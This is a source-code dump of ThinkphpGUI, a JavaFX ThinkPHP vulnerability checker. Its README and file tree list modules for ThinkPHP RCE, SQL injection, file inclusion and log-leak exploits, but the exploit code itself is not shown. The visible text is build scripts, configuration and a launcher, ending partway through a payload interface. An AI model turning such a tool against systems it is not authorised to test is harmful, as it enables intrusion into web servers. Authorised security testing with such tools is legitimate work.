├── .gitignore
├── .idea
├── .gitignore
├── artifacts
│ └── ThinkphpGUI_jar.xml
├── encodings.xml
├── misc.xml
├── uiDesigner.xml
└── vcs.xml
├── .mvn
└── wrapper
│ ├── maven-wrapper.jar
│ └── maven-wrapper.properties
├── README.md
├── mvnw
├── mvnw.cmd
├── pom.xml
└── src
└── main
├── java
└── com
│ └── thinkphp
│ └── thinkphpgui
│ ├── ThinkPhpGuiApplication.java
│ ├── common
│ ├── BasePayload.java
│ └── ProxyAuthenticator.java
│ ├── controller
│ └── ThinkphpGUIController.java
│ ├── entity
│ └── Result.java
│ ├── exploit
│ ├── tp2_rce.java
│ ├── tp3.java
│ ├── tp3_log.java
│ ├── tp3_log_rce.java
│ ├── tp50.java
│ ├── tp5010.java
│ ├── tp5022_5129.java
│ ├── tp5023.java
│ ├── tp5024_5130.java
│ ├── tp5_db.java
│ ├── tp5_file_inclusion.java
│ ├── tp5_info_leak.java
│ ├── tp5_log.java
│ ├── tp5_method_filter_rce.java
│ ├── tp5_session_include.java
│ ├── tp5_showid_rce.java
│ ├── tp5_sql.java
│ ├── tp6_lang.java
│ ├── tp6_log.java
│ ├── tp6_session_file_write.java
│ ├── tp_catch.java
│ ├── tp_checkcode_time_sqli.java
│ ├── tp_multi_sql_leak.java
│ ├── tp_pay_orderid_sqli.java
│ ├── tp_update_sql.java
│ └── tp_view_recent_xff_sqli.java
│ ├── service
│ ├── BatchCheckTask.java
│ └── CheckTask.java
│ └── util
│ ├── ExpList.java
│ ├── Module.java
│ └── Tools.java
└── resources
├── META-INF
└── MANIFEST.MF
└── com
└── thinkphp
└── thinkphpgui
└── thinkphp-view.fxml
/.gitignore:
--------------------------------------------------------------------------------
1 | target/
2 | !.mvn/wrapper/maven-wrapper.jar
3 | !**/src/main/**/target/
4 | !**/src/test/**/target/
5 |
6 | ### IntelliJ IDEA ###
7 | .idea/modules.xml
8 | .idea/jarRepositories.xml
9 | .idea/compiler.xml
10 | .idea/libraries/
11 | *.iws
12 | *.iml
13 | *.ipr
14 |
15 | ### Eclipse ###
16 | .apt_generated
17 | .classpath
18 | .factorypath
19 | .project
20 | .settings
21 | .springBeans
22 | .sts4-cache
23 |
24 | ### NetBeans ###
25 | /nbproject/private/
26 | /nbbuild/
27 | /dist/
28 | /nbdist/
29 | /.nb-gradle/
30 | build/
31 | !**/src/main/**/build/
32 | !**/src/test/**/build/
33 |
34 | ### VS Code ###
35 | .vscode/
36 |
37 | ### Mac OS ###
38 | .DS_Store
--------------------------------------------------------------------------------
/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # 默认忽略的文件
2 | /shelf/
3 | /workspace.xml
4 | # 基于编辑器的 HTTP 客户端请求
5 | /httpRequests/
6 | # Datasource local storage ignored files
7 | /dataSources/
8 | /dataSources.local.xml
9 |
--------------------------------------------------------------------------------
/.idea/artifacts/ThinkphpGUI_jar.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | $PROJECT_DIR$/out/artifacts/ThinkphpGUI_jar
--------------------------------------------------------------------------------
/.idea/encodings.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/.idea/misc.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/.idea/uiDesigner.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/.idea/vcs.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/.mvn/wrapper/maven-wrapper.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nex121/ThinkphpGUI/e2f6844194b95fe7c69ce56df7de3d4c02666ca9/.mvn/wrapper/maven-wrapper.jar
--------------------------------------------------------------------------------
/.mvn/wrapper/maven-wrapper.properties:
--------------------------------------------------------------------------------
1 | distributionUrl=https://repo.maven.apache.org/maven2/org/apache/maven/apache-maven/3.8.5/apache-maven-3.8.5-bin.zip
2 | wrapperUrl=https://repo.maven.apache.org/maven2/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # ThinkphpGUI
2 |
3 | 改自https://github.com/Lotus6/ThinkphpGUI
4 |
5 | # 新增 poc,全部漏洞列表如下:
6 |
7 | ThinkPHP 5.0 RCE
8 |
9 | ThinkPHP 5.0.10 RCE
10 |
11 | ThinkPHP 5.0.22/5.1.29 RCE
12 |
13 | ThinkPHP 5.0.23 RCE
14 |
15 | ThinkPHP 5.0.24-5.1.30 RCE
16 |
17 | ThinkPHP 5 文件包含漏洞
18 |
19 | ThinkPHP 5 show-id RCE
20 |
21 | ThinkPHP 5 method filter RCE
22 |
23 | ThinkPHP 5 session 文件包含漏洞
24 |
25 | ThinkPHP 5 SQL注入漏洞 && 敏感信息泄露
26 |
27 | ThinkPHP 5.x 数据库信息泄露
28 |
29 | ThinkPHP 5.x 日志泄露
30 |
31 | ThinkPHP 3.x RCE
32 |
33 | ThinkPHP 3.x 日志泄露
34 |
35 | ThinkPHP 3.x Log RCE
36 |
37 | ThinkPHP 6.x 日志泄露
38 |
39 | ThinkPHP 6 文件包含漏洞
40 |
41 | ThinkPHP 6 session文件写入
42 |
43 | ThinkPHP catch 命令执行漏洞
44 |
45 | ThinkPHP check-code sql注入漏洞
46 |
47 | ThinkPHP multi sql注入 && 信息泄露漏洞
48 |
49 | ThinkPHP orderid sql注入
50 |
51 | ThinkPHP update sql注入
52 |
53 | ThinkPHP recent_xff sql注入
54 |
55 | # 界面如下
56 |
57 | 
58 |
59 | 
60 |
61 |
--------------------------------------------------------------------------------
/mvnw:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | # ----------------------------------------------------------------------------
3 | # Licensed to the Apache Software Foundation (ASF) under one
4 | # or more contributor license agreements. See the NOTICE file
5 | # distributed with this work for additional information
6 | # regarding copyright ownership. The ASF licenses this file
7 | # to you under the Apache License, Version 2.0 (the
8 | # "License"); you may not use this file except in compliance
9 | # with the License. You may obtain a copy of the License at
10 | #
11 | # https://www.apache.org/licenses/LICENSE-2.0
12 | #
13 | # Unless required by applicable law or agreed to in writing,
14 | # software distributed under the License is distributed on an
15 | # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
16 | # KIND, either express or implied. See the License for the
17 | # specific language governing permissions and limitations
18 | # under the License.
19 | # ----------------------------------------------------------------------------
20 |
21 | # ----------------------------------------------------------------------------
22 | # Maven Start Up Batch script
23 | #
24 | # Required ENV vars:
25 | # ------------------
26 | # JAVA_HOME - location of a JDK home dir
27 | #
28 | # Optional ENV vars
29 | # -----------------
30 | # M2_HOME - location of maven2's installed home dir
31 | # MAVEN_OPTS - parameters passed to the Java VM when running Maven
32 | # e.g. to debug Maven itself, use
33 | # set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000
34 | # MAVEN_SKIP_RC - flag to disable loading of mavenrc files
35 | # ----------------------------------------------------------------------------
36 |
37 | if [ -z "$MAVEN_SKIP_RC" ] ; then
38 |
39 | if [ -f /usr/local/etc/mavenrc ] ; then
40 | . /usr/local/etc/mavenrc
41 | fi
42 |
43 | if [ -f /etc/mavenrc ] ; then
44 | . /etc/mavenrc
45 | fi
46 |
47 | if [ -f "$HOME/.mavenrc" ] ; then
48 | . "$HOME/.mavenrc"
49 | fi
50 |
51 | fi
52 |
53 | # OS specific support. $var _must_ be set to either true or false.
54 | cygwin=false;
55 | darwin=false;
56 | mingw=false
57 | case "`uname`" in
58 | CYGWIN*) cygwin=true ;;
59 | MINGW*) mingw=true;;
60 | Darwin*) darwin=true
61 | # Use /usr/libexec/java_home if available, otherwise fall back to /Library/Java/Home
62 | # See https://developer.apple.com/library/mac/qa/qa1170/_index.html
63 | if [ -z "$JAVA_HOME" ]; then
64 | if [ -x "/usr/libexec/java_home" ]; then
65 | export JAVA_HOME="`/usr/libexec/java_home`"
66 | else
67 | export JAVA_HOME="/Library/Java/Home"
68 | fi
69 | fi
70 | ;;
71 | esac
72 |
73 | if [ -z "$JAVA_HOME" ] ; then
74 | if [ -r /etc/gentoo-release ] ; then
75 | JAVA_HOME=`java-config --jre-home`
76 | fi
77 | fi
78 |
79 | if [ -z "$M2_HOME" ] ; then
80 | ## resolve links - $0 may be a link to maven's home
81 | PRG="$0"
82 |
83 | # need this for relative symlinks
84 | while [ -h "$PRG" ] ; do
85 | ls=`ls -ld "$PRG"`
86 | link=`expr "$ls" : '.*-> \(.*\)$'`
87 | if expr "$link" : '/.*' > /dev/null; then
88 | PRG="$link"
89 | else
90 | PRG="`dirname "$PRG"`/$link"
91 | fi
92 | done
93 |
94 | saveddir=`pwd`
95 |
96 | M2_HOME=`dirname "$PRG"`/..
97 |
98 | # make it fully qualified
99 | M2_HOME=`cd "$M2_HOME" && pwd`
100 |
101 | cd "$saveddir"
102 | # echo Using m2 at $M2_HOME
103 | fi
104 |
105 | # For Cygwin, ensure paths are in UNIX format before anything is touched
106 | if $cygwin ; then
107 | [ -n "$M2_HOME" ] &&
108 | M2_HOME=`cygpath --unix "$M2_HOME"`
109 | [ -n "$JAVA_HOME" ] &&
110 | JAVA_HOME=`cygpath --unix "$JAVA_HOME"`
111 | [ -n "$CLASSPATH" ] &&
112 | CLASSPATH=`cygpath --path --unix "$CLASSPATH"`
113 | fi
114 |
115 | # For Mingw, ensure paths are in UNIX format before anything is touched
116 | if $mingw ; then
117 | [ -n "$M2_HOME" ] &&
118 | M2_HOME="`(cd "$M2_HOME"; pwd)`"
119 | [ -n "$JAVA_HOME" ] &&
120 | JAVA_HOME="`(cd "$JAVA_HOME"; pwd)`"
121 | fi
122 |
123 | if [ -z "$JAVA_HOME" ]; then
124 | javaExecutable="`which javac`"
125 | if [ -n "$javaExecutable" ] && ! [ "`expr \"$javaExecutable\" : '\([^ ]*\)'`" = "no" ]; then
126 | # readlink(1) is not available as standard on Solaris 10.
127 | readLink=`which readlink`
128 | if [ ! `expr "$readLink" : '\([^ ]*\)'` = "no" ]; then
129 | if $darwin ; then
130 | javaHome="`dirname \"$javaExecutable\"`"
131 | javaExecutable="`cd \"$javaHome\" && pwd -P`/javac"
132 | else
133 | javaExecutable="`readlink -f \"$javaExecutable\"`"
134 | fi
135 | javaHome="`dirname \"$javaExecutable\"`"
136 | javaHome=`expr "$javaHome" : '\(.*\)/bin'`
137 | JAVA_HOME="$javaHome"
138 | export JAVA_HOME
139 | fi
140 | fi
141 | fi
142 |
143 | if [ -z "$JAVACMD" ] ; then
144 | if [ -n "$JAVA_HOME" ] ; then
145 | if [ -x "$JAVA_HOME/jre/sh/java" ] ; then
146 | # IBM's JDK on AIX uses strange locations for the executables
147 | JAVACMD="$JAVA_HOME/jre/sh/java"
148 | else
149 | JAVACMD="$JAVA_HOME/bin/java"
150 | fi
151 | else
152 | JAVACMD="`\\unset -f command; \\command -v java`"
153 | fi
154 | fi
155 |
156 | if [ ! -x "$JAVACMD" ] ; then
157 | echo "Error: JAVA_HOME is not defined correctly." >&2
158 | echo " We cannot execute $JAVACMD" >&2
159 | exit 1
160 | fi
161 |
162 | if [ -z "$JAVA_HOME" ] ; then
163 | echo "Warning: JAVA_HOME environment variable is not set."
164 | fi
165 |
166 | CLASSWORLDS_LAUNCHER=org.codehaus.plexus.classworlds.launcher.Launcher
167 |
168 | # traverses directory structure from process work directory to filesystem root
169 | # first directory with .mvn subdirectory is considered project base directory
find_maven_basedir() {
  # $1: directory to start from.
  # Prints the first directory, walking from $1 towards "/", that contains a
  # .mvn subdirectory; prints $1 unchanged when none is found before "/".
  # Returns 1, after printing a message on stdout, when $1 is empty.
  if [ -z "$1" ]; then
    echo "Path not specified to find_maven_basedir"
    return 1
  fi

  basedir="$1"
  wdir="$1"
  until [ "$wdir" = '/' ]; do
    if [ -d "$wdir/.mvn" ]; then
      basedir=$wdir
      break
    fi
    # Step up only when wdir is an existing directory; the original script
    # labels this guard a workaround for JBEAP-8937 (Solaris 10/Sparc).
    if [ -d "${wdir}" ]; then
      wdir=$(cd "$wdir/.."; pwd)
    fi
  done
  echo "${basedir}"
}
193 |
194 | # concatenates all lines of a file
concat_lines() {
  # $1: path to a file. Prints its content with every run of newlines turned
  # into a single space; prints nothing when $1 is not a regular file.
  [ -f "$1" ] || return 0
  echo "$(tr -s '\n' ' ' < "$1")"
}
200 |
201 | BASE_DIR=`find_maven_basedir "$(pwd)"`
202 | if [ -z "$BASE_DIR" ]; then
203 | exit 1;
204 | fi
205 |
206 | ##########################################################################################
207 | # Extension to allow automatically downloading the maven-wrapper.jar from Maven-central
208 | # This allows using the maven wrapper in projects that prohibit checking in binary data.
209 | ##########################################################################################
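# Ensure .mvn/wrapper/maven-wrapper.jar exists, downloading it when it is missing.
#
# Reads:  BASE_DIR, cygwin, JAVA_HOME, MVNW_VERBOSE, MVNW_REPOURL,
#         MVNW_USERNAME, MVNW_PASSWORD
# Source: wrapperUrl from .mvn/wrapper/maven-wrapper.properties when that key is
#         present; otherwise MVNW_REPOURL; otherwise Maven Central.
#
# Integrity: neither branch compares the jar with a known digest. A jar that is
# already present (for example one committed to the repository) is used as-is,
# and a downloaded one is trusted on the strength of the URL alone. The script
# later puts this jar on the JVM classpath, so verify its SHA-256 out of band.
# Newer Maven Wrapper releases support a wrapperSha256Sum property for this.
if [ -r "$BASE_DIR/.mvn/wrapper/maven-wrapper.jar" ]; then
    if [ "$MVNW_VERBOSE" = true ]; then
      echo "Found .mvn/wrapper/maven-wrapper.jar"
    fi
else
    if [ "$MVNW_VERBOSE" = true ]; then
      echo "Couldn't find .mvn/wrapper/maven-wrapper.jar, downloading it ..."
    fi
    if [ -n "$MVNW_REPOURL" ]; then
      jarUrl="$MVNW_REPOURL/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar"
    else
      jarUrl="https://repo.maven.apache.org/maven2/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar"
    fi
    # A wrapperUrl entry in the properties file overrides the default above, so
    # the download location is controlled by the checked-out repository.
    # -r keeps backslashes in the value literal instead of treating them as escapes.
    while IFS="=" read -r key value; do
      case "$key" in (wrapperUrl) jarUrl="$value"; break ;;
      esac
    done < "$BASE_DIR/.mvn/wrapper/maven-wrapper.properties"
    if [ "$MVNW_VERBOSE" = true ]; then
      echo "Downloading from: $jarUrl"
    fi
    wrapperJarPath="$BASE_DIR/.mvn/wrapper/maven-wrapper.jar"
    if $cygwin; then
      wrapperJarPath=`cygpath --path --windows "$wrapperJarPath"`
    fi

    # The credentials are quoted so that spaces or glob characters in them are
    # not split or expanded by the shell. They are still passed as command-line
    # arguments, so they are visible in the process list while the download runs.
    if command -v wget > /dev/null; then
        if [ "$MVNW_VERBOSE" = true ]; then
          echo "Found wget ... using wget"
        fi
        if [ -z "$MVNW_USERNAME" ] || [ -z "$MVNW_PASSWORD" ]; then
            wget "$jarUrl" -O "$wrapperJarPath" || rm -f "$wrapperJarPath"
        else
            wget --http-user="$MVNW_USERNAME" --http-password="$MVNW_PASSWORD" "$jarUrl" -O "$wrapperJarPath" || rm -f "$wrapperJarPath"
        fi
    elif command -v curl > /dev/null; then
        if [ "$MVNW_VERBOSE" = true ]; then
          echo "Found curl ... using curl"
        fi
        if [ -z "$MVNW_USERNAME" ] || [ -z "$MVNW_PASSWORD" ]; then
            curl -o "$wrapperJarPath" "$jarUrl" -f
        else
            curl --user "$MVNW_USERNAME:$MVNW_PASSWORD" -o "$wrapperJarPath" "$jarUrl" -f
        fi

    else
        if [ "$MVNW_VERBOSE" = true ]; then
          echo "Falling back to using Java to download"
        fi
        javaClass="$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.java"
        # For Cygwin, switch paths to Windows format before running javac
        if $cygwin; then
          javaClass=`cygpath --path --windows "$javaClass"`
        fi
        if [ -e "$javaClass" ]; then
            if [ ! -e "$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.class" ]; then
                if [ "$MVNW_VERBOSE" = true ]; then
                  echo " - Compiling MavenWrapperDownloader.java ..."
                fi
                # Compiling the Java class
                ("$JAVA_HOME/bin/javac" "$javaClass")
            fi
            if [ -e "$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.class" ]; then
                # Running the downloader
                if [ "$MVNW_VERBOSE" = true ]; then
                  echo " - Running MavenWrapperDownloader.java ..."
                fi
                # NOTE(review): MAVEN_PROJECTBASEDIR is exported by this script only
                # after this section, so it is empty here unless inherited from the
                # environment. Confirm the downloader copes with that.
                ("$JAVA_HOME/bin/java" -cp .mvn/wrapper MavenWrapperDownloader "$MAVEN_PROJECTBASEDIR")
            fi
        fi
    fi
fi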
281 | ##########################################################################################
282 | # End of extension
283 | ##########################################################################################
284 |
285 | export MAVEN_PROJECTBASEDIR=${MAVEN_BASEDIR:-"$BASE_DIR"}
286 | if [ "$MVNW_VERBOSE" = true ]; then
287 | echo $MAVEN_PROJECTBASEDIR
288 | fi
289 | MAVEN_OPTS="$(concat_lines "$MAVEN_PROJECTBASEDIR/.mvn/jvm.config") $MAVEN_OPTS"
290 |
291 | # For Cygwin, switch paths to Windows format before running java
292 | if $cygwin; then
293 | [ -n "$M2_HOME" ] &&
294 | M2_HOME=`cygpath --path --windows "$M2_HOME"`
295 | [ -n "$JAVA_HOME" ] &&
296 | JAVA_HOME=`cygpath --path --windows "$JAVA_HOME"`
297 | [ -n "$CLASSPATH" ] &&
298 | CLASSPATH=`cygpath --path --windows "$CLASSPATH"`
299 | [ -n "$MAVEN_PROJECTBASEDIR" ] &&
300 | MAVEN_PROJECTBASEDIR=`cygpath --path --windows "$MAVEN_PROJECTBASEDIR"`
301 | fi
302 |
303 | # Provide a "standardized" way to retrieve the CLI args that will
304 | # work with both Windows and non-Windows executions.
305 | MAVEN_CMD_LINE_ARGS="$MAVEN_CONFIG $@"
306 | export MAVEN_CMD_LINE_ARGS
307 |
308 | WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain
309 |
310 | exec "$JAVACMD" \
311 | $MAVEN_OPTS \
312 | $MAVEN_DEBUG_OPTS \
313 | -classpath "$MAVEN_PROJECTBASEDIR/.mvn/wrapper/maven-wrapper.jar" \
314 | "-Dmaven.home=${M2_HOME}" \
315 | "-Dmaven.multiModuleProjectDirectory=${MAVEN_PROJECTBASEDIR}" \
316 | ${WRAPPER_LAUNCHER} $MAVEN_CONFIG "$@"
317 |
--------------------------------------------------------------------------------
/mvnw.cmd:
--------------------------------------------------------------------------------
1 | @REM ----------------------------------------------------------------------------
2 | @REM Licensed to the Apache Software Foundation (ASF) under one
3 | @REM or more contributor license agreements. See the NOTICE file
4 | @REM distributed with this work for additional information
5 | @REM regarding copyright ownership. The ASF licenses this file
6 | @REM to you under the Apache License, Version 2.0 (the
7 | @REM "License"); you may not use this file except in compliance
8 | @REM with the License. You may obtain a copy of the License at
9 | @REM
10 | @REM https://www.apache.org/licenses/LICENSE-2.0
11 | @REM
12 | @REM Unless required by applicable law or agreed to in writing,
13 | @REM software distributed under the License is distributed on an
14 | @REM "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
15 | @REM KIND, either express or implied. See the License for the
16 | @REM specific language governing permissions and limitations
17 | @REM under the License.
18 | @REM ----------------------------------------------------------------------------
19 |
20 | @REM ----------------------------------------------------------------------------
21 | @REM Maven Start Up Batch script
22 | @REM
23 | @REM Required ENV vars:
24 | @REM JAVA_HOME - location of a JDK home dir
25 | @REM
26 | @REM Optional ENV vars
27 | @REM M2_HOME - location of maven2's installed home dir
28 | @REM MAVEN_BATCH_ECHO - set to 'on' to enable the echoing of the batch commands
29 | @REM MAVEN_BATCH_PAUSE - set to 'on' to wait for a keystroke before ending
30 | @REM MAVEN_OPTS - parameters passed to the Java VM when running Maven
31 | @REM e.g. to debug Maven itself, use
32 | @REM set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000
33 | @REM MAVEN_SKIP_RC - flag to disable loading of mavenrc files
34 | @REM ----------------------------------------------------------------------------
35 |
36 | @REM Begin all REM lines with '@' in case MAVEN_BATCH_ECHO is 'on'
37 | @echo off
38 | @REM set title of command window
39 | title %0
40 | @REM enable echoing by setting MAVEN_BATCH_ECHO to 'on'
41 | @if "%MAVEN_BATCH_ECHO%" == "on" echo %MAVEN_BATCH_ECHO%
42 |
43 | @REM set %HOME% to equivalent of $HOME
44 | if "%HOME%" == "" (set "HOME=%HOMEDRIVE%%HOMEPATH%")
45 |
46 | @REM Execute a user defined script before this one
47 | if not "%MAVEN_SKIP_RC%" == "" goto skipRcPre
48 | @REM check for pre script, once with legacy .bat ending and once with .cmd ending
49 | if exist "%USERPROFILE%\mavenrc_pre.bat" call "%USERPROFILE%\mavenrc_pre.bat" %*
50 | if exist "%USERPROFILE%\mavenrc_pre.cmd" call "%USERPROFILE%\mavenrc_pre.cmd" %*
51 | :skipRcPre
52 |
53 | @setlocal
54 |
55 | set ERROR_CODE=0
56 |
57 | @REM To isolate internal variables from possible post scripts, we use another setlocal
58 | @setlocal
59 |
60 | @REM ==== START VALIDATION ====
61 | if not "%JAVA_HOME%" == "" goto OkJHome
62 |
63 | echo.
64 | echo Error: JAVA_HOME not found in your environment. >&2
65 | echo Please set the JAVA_HOME variable in your environment to match the >&2
66 | echo location of your Java installation. >&2
67 | echo.
68 | goto error
69 |
70 | :OkJHome
71 | if exist "%JAVA_HOME%\bin\java.exe" goto init
72 |
73 | echo.
74 | echo Error: JAVA_HOME is set to an invalid directory. >&2
75 | echo JAVA_HOME = "%JAVA_HOME%" >&2
76 | echo Please set the JAVA_HOME variable in your environment to match the >&2
77 | echo location of your Java installation. >&2
78 | echo.
79 | goto error
80 |
81 | @REM ==== END VALIDATION ====
82 |
83 | :init
84 |
85 | @REM Find the project base dir, i.e. the directory that contains the folder ".mvn".
86 | @REM Fallback to current working directory if not found.
87 |
88 | set MAVEN_PROJECTBASEDIR=%MAVEN_BASEDIR%
89 | IF NOT "%MAVEN_PROJECTBASEDIR%"=="" goto endDetectBaseDir
90 |
91 | set EXEC_DIR=%CD%
92 | set WDIR=%EXEC_DIR%
93 | :findBaseDir
94 | IF EXIST "%WDIR%"\.mvn goto baseDirFound
95 | cd ..
96 | IF "%WDIR%"=="%CD%" goto baseDirNotFound
97 | set WDIR=%CD%
98 | goto findBaseDir
99 |
100 | :baseDirFound
101 | set MAVEN_PROJECTBASEDIR=%WDIR%
102 | cd "%EXEC_DIR%"
103 | goto endDetectBaseDir
104 |
105 | :baseDirNotFound
106 | set MAVEN_PROJECTBASEDIR=%EXEC_DIR%
107 | cd "%EXEC_DIR%"
108 |
109 | :endDetectBaseDir
110 |
111 | IF NOT EXIST "%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config" goto endReadAdditionalConfig
112 |
113 | @setlocal EnableExtensions EnableDelayedExpansion
114 | for /F "usebackq delims=" %%a in ("%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config") do set JVM_CONFIG_MAVEN_PROPS=!JVM_CONFIG_MAVEN_PROPS! %%a
115 | @endlocal & set JVM_CONFIG_MAVEN_PROPS=%JVM_CONFIG_MAVEN_PROPS%
116 |
117 | :endReadAdditionalConfig
118 |
119 | SET MAVEN_JAVA_EXE="%JAVA_HOME%\bin\java.exe"
120 | set WRAPPER_JAR="%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.jar"
121 | set WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain
122 |
123 | set DOWNLOAD_URL="https://repo.maven.apache.org/maven2/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar"
124 |
125 | FOR /F "usebackq tokens=1,2 delims==" %%A IN ("%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.properties") DO (
126 | IF "%%A"=="wrapperUrl" SET DOWNLOAD_URL=%%B
127 | )
128 |
129 | @REM Extension to allow automatically downloading the maven-wrapper.jar from Maven-central
130 | @REM This allows using the maven wrapper in projects that prohibit checking in binary data.
131 | if exist %WRAPPER_JAR% (
132 | if "%MVNW_VERBOSE%" == "true" (
133 | echo Found %WRAPPER_JAR%
134 | )
135 | ) else (
136 | if not "%MVNW_REPOURL%" == "" (
137 | SET DOWNLOAD_URL="%MVNW_REPOURL%/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar"
138 | )
139 | if "%MVNW_VERBOSE%" == "true" (
140 | echo Couldn't find %WRAPPER_JAR%, downloading it ...
141 | echo Downloading from: %DOWNLOAD_URL%
142 | )
143 |
144 | powershell -Command "&{"^
145 | "$webclient = new-object System.Net.WebClient;"^
146 | "if (-not ([string]::IsNullOrEmpty('%MVNW_USERNAME%') -and [string]::IsNullOrEmpty('%MVNW_PASSWORD%'))) {"^
147 | "$webclient.Credentials = new-object System.Net.NetworkCredential('%MVNW_USERNAME%', '%MVNW_PASSWORD%');"^
148 | "}"^
149 | "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $webclient.DownloadFile('%DOWNLOAD_URL%', '%WRAPPER_JAR%')"^
150 | "}"
151 | if "%MVNW_VERBOSE%" == "true" (
152 | echo Finished downloading %WRAPPER_JAR%
153 | )
154 | )
155 | @REM End of extension
156 |
157 | @REM Provide a "standardized" way to retrieve the CLI args that will
158 | @REM work with both Windows and non-Windows executions.
159 | set MAVEN_CMD_LINE_ARGS=%*
160 |
161 | %MAVEN_JAVA_EXE% ^
162 | %JVM_CONFIG_MAVEN_PROPS% ^
163 | %MAVEN_OPTS% ^
164 | %MAVEN_DEBUG_OPTS% ^
165 | -classpath %WRAPPER_JAR% ^
166 | "-Dmaven.multiModuleProjectDirectory=%MAVEN_PROJECTBASEDIR%" ^
167 | %WRAPPER_LAUNCHER% %MAVEN_CONFIG% %*
168 | if ERRORLEVEL 1 goto error
169 | goto end
170 |
171 | :error
172 | set ERROR_CODE=1
173 |
174 | :end
175 | @endlocal & set ERROR_CODE=%ERROR_CODE%
176 |
177 | if not "%MAVEN_SKIP_RC%"=="" goto skipRcPost
178 | @REM check for post script, once with legacy .bat ending and once with .cmd ending
179 | if exist "%USERPROFILE%\mavenrc_post.bat" call "%USERPROFILE%\mavenrc_post.bat"
180 | if exist "%USERPROFILE%\mavenrc_post.cmd" call "%USERPROFILE%\mavenrc_post.cmd"
181 | :skipRcPost
182 |
183 | @REM pause the script if MAVEN_BATCH_PAUSE is set to 'on'
184 | if "%MAVEN_BATCH_PAUSE%"=="on" pause
185 |
186 | if "%MAVEN_TERMINATE_CMD%"=="on" exit %ERROR_CODE%
187 |
188 | cmd /C exit /B %ERROR_CODE%
189 |
--------------------------------------------------------------------------------
/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 | 4.0.0
6 |
7 | com.thinkphp
8 | ThinkphpGUI
9 | 1.0-SNAPSHOT
10 | ThinkphpGUI
11 |
12 |
13 | UTF-8
14 | 5.9.1
15 |
16 |
17 |
18 |
19 | com.github.kevinsawicki
20 | http-request
21 | 6.0
22 |
23 |
24 |
25 | org.openjfx
26 | javafx-controls
27 | 17.0.2
28 |
29 |
30 | org.openjfx
31 | javafx-fxml
32 | 17.0.2
33 |
34 |
35 |
36 | org.junit.jupiter
37 | junit-jupiter-api
38 | ${junit.version}
39 | test
40 |
41 |
42 | org.junit.jupiter
43 | junit-jupiter-engine
44 | ${junit.version}
45 | test
46 |
47 |
48 |
49 |
50 |
51 |
52 | org.apache.maven.plugins
53 | maven-compiler-plugin
54 | 3.10.1
55 |
56 | 8
57 | 8
58 |
59 |
60 |
61 | org.openjfx
62 | javafx-maven-plugin
63 | 0.0.8
64 |
65 |
66 |
67 | default-cli
68 |
69 | com.thinkphp.thinkphpgui/com.thinkphp.thinkphpgui.HelloApplication
70 | app
71 | app
72 | app
73 | true
74 | true
75 | true
76 |
77 |
78 |
79 |
80 |
81 |
82 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/ThinkPhpGuiApplication.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui;
2 |
3 | import javafx.application.Application;
4 | import javafx.fxml.FXMLLoader;
5 | import javafx.scene.Scene;
6 | import javafx.stage.Stage;
7 |
8 | import java.io.IOException;
9 |
/**
 * JavaFX entry point: loads {@code thinkphp-view.fxml} and shows it in the primary stage.
 */
public class ThinkPhpGuiApplication extends Application {
    /**
     * Builds the main window from the FXML layout resolved relative to this class.
     *
     * @param stage primary stage supplied by the JavaFX runtime
     * @throws IOException if the FXML document cannot be loaded
     */
    @Override
    public void start(Stage stage) throws IOException {
        final FXMLLoader viewLoader =
                new FXMLLoader(ThinkPhpGuiApplication.class.getResource("thinkphp-view.fxml"));
        final Scene mainScene = new Scene(viewLoader.load(), 1200, 800);
        stage.setScene(mainScene);
        stage.setTitle("thinkphp检测工具,项目源地址:https://github.com/Lotus6/ThinkphpGUI by nex121");
        stage.show();
    }

    /**
     * Starts the JavaFX runtime; the command-line arguments are not forwarded to it.
     *
     * @param args ignored
     */
    public static void main(String[] args) {
        launch();
    }
}
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/common/BasePayload.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.common;
2 |
3 | import com.thinkphp.thinkphpgui.entity.Result;
4 |
/**
 * Contract of three URL-driven operations, each reporting its outcome as a {@link Result}.
 *
 * <p>NOTE(review): no implementation is visible in this listing. Presumably the classes in
 * the {@code exploit} package implement this interface; confirm against those files.
 */
public interface BasePayload {

    /**
     * Runs the check operation against {@code url}.
     *
     * @param url target URL as supplied by the caller; no validation is visible at this level
     * @return the outcome reported by the implementation
     * @throws Exception implementation-defined; callers must handle any failure type
     */
    Result checkVUL(String url) throws Exception;

    /**
